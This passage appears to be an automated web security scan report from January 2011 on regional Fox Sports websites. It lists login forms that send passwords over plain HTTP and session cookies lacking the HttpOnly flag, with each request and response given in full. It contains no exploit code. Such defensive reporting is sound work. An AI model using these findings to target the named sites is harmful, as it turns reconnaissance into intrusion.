User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=be186108f22ff29fc5206079350ee590; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 76839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.12. http://www.foxsportsohio.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsohio.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportsohio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 78763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.13. http://www.foxsportssouth.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:08 GMT
Server: Apache
Set-Cookie: PHPSESSID=8fc384966e11984cdc4ff0ba62e6bda3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 87289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.14. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 83915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.15. http://www.foxsportssouthwest.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:09 GMT
Server: Apache
Set-Cookie: PHPSESSID=7d9d4d196f8c57526962134428908ef5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.16. http://www.foxsportstennessee.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportstennessee.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportstennessee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=452c8dd2904462f9015b783662923a87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 68716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.17. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportswest.com
Path:   /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=52ba63048e530107d21cb80ac654b510; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.18. http://www.foxsportswisconsin.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportswisconsin.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportswisconsin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=b346a6944b6aa67934f8452ef87105ed; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 18 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.foxsportsarizona.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsarizona.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=af9575f12421c13e00e39bf3dd199ca5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 84050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=dce594637b946858ac8562e11cd29bfc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.3. http://www.foxsportscarolinas.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportscarolinas.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportscarolinas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 12 Jan 2011 16:30:48 GMT
Date: Wed, 12 Jan 2011 16:30:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3271d39cc8617c11fa58992b3826f5a0; path=/
Content-Length: 67154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.4. http://www.foxsportsdetroit.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsdetroit.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=f98e5e7a4e031dcbf5dbf7acff41bb35; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.5. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /01/11/11/Hoke-who/landing.html HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:26:41 GMT
Server: Apache
Set-Cookie: PHPSESSID=05e45841134be0f8e849c03d0475b24f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.6. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:47 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7fa2ad3beef39ba25d4799d4abff0a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.7. http://www.foxsportsflorida.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsflorida.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=aac2f23f8215a809567600eb37ffca51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 76322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.8. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsflorida.com
Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=552dd2fb6e357039c005c0bb8665d203; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 47665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.9. http://www.foxsportshouston.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportshouston.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportshouston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 69986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.10. http://www.foxsportskansascity.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportskansascity.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportskansascity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=9d01435dbe7e17e2b982f0304dd0dd69; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 67136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.11. http://www.foxsportsmidwest.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsmidwest.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportsmidwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=be186108f22ff29fc5206079350ee590; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 76839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.12. http://www.foxsportsohio.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportsohio.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportsohio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 78763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.13. http://www.foxsportssouth.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportssouth.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:08 GMT
Server: Apache
Set-Cookie: PHPSESSID=8fc384966e11984cdc4ff0ba62e6bda3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 87289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...

3.14. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 83915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...

3.15. http://www.foxsportssouthwest.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportssouthwest.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:09 GMT
Server: Apache
Set-Cookie: PHPSESSID=7d9d4d196f8c57526962134428908ef5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74557

